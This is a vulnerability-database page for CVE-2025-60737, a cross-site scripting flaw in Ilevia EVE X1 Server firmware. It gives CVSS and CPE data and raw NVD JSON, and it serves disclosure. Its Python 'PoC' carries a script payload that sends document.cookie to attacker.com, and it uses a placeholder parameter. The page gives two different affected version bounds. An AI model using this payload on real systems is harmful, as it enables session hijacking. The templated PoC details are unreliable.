Security Vulnerability Report
中文
CVE-2025-60737 CVSS 6.1 MEDIUM

CVE-2025-60737

Published: 2025-11-20 16:15:59
Last Modified: 2025-12-12 15:32:10

Description

Cross Site Scripting vulnerability in Ilevia EVE X1 Server Firmware Version<= 4.7.18.0.eden:Logic Version<=6.00 - 2025_07_21 allows a remote attacker to execute arbitrary code via the /index.php component

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:ilevia:eve_x1_server_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:ilevia:eve_x1_server:-:*:*:*:*:*:*:* - NOT VULNERABLE
Ilevia EVE X1 Server Firmware < 4.7.18.0
eden:Logic Version < 6.00 (2025_07_21)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-60737 PoC - XSS in Ilevia EVE X1 Server /index.php # Target: Ilevia EVE X1 Server Firmware <= 4.7.18.0 TARGET_URL = "http://target-server/index.php" # XSS payload to steal session cookies xss_payload = "<script>document.location='https://attacker.com/steal?c='+document.cookie</script>" def exploit_xss(): """ Exploit CVE-2025-60737: XSS vulnerability in /index.php The payload is injected into a vulnerable parameter that is reflected without sanitization. """ params = { 'param': xss_payload # Replace 'param' with actual vulnerable parameter } try: response = requests.get(TARGET_URL, params=params, timeout=10) print(f"[*] Request sent to {TARGET_URL}") print(f"[*] Payload: {xss_payload}") if xss_payload in response.text: print("[+] XSS payload reflected in response - vulnerability confirmed") else: print("[-] Payload not found in response") except requests.RequestException as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": print("CVE-2025-60737 PoC - Ilevia EVE X1 Server XSS") exploit_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60737", "sourceIdentifier": "[email protected]", "published": "2025-11-20T16:15:58.800", "lastModified": "2025-12-12T15:32:10.470", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Scripting vulnerability in Ilevia EVE X1 Server Firmware Version<= 4.7.18.0.eden:Logic Version<=6.00 - 2025_07_21 allows a remote attacker to execute arbitrary code via the /index.php component"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:ilevia:eve_x1_server_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.7.18.0", "matchCriteriaId": "25D89BA5-1632-4243-BE68-D42803774A22"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:ilevia:eve_x1_server:-:*:*:*:*:*:*:*", "matchCriteriaId": "72B4F8B5-4641-4371-8759-3AB18EC87FB6"}]}]}], "references": [{"url": "https://github.com/iSee857/ilevia-EVE-X1-Server-CSRF", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}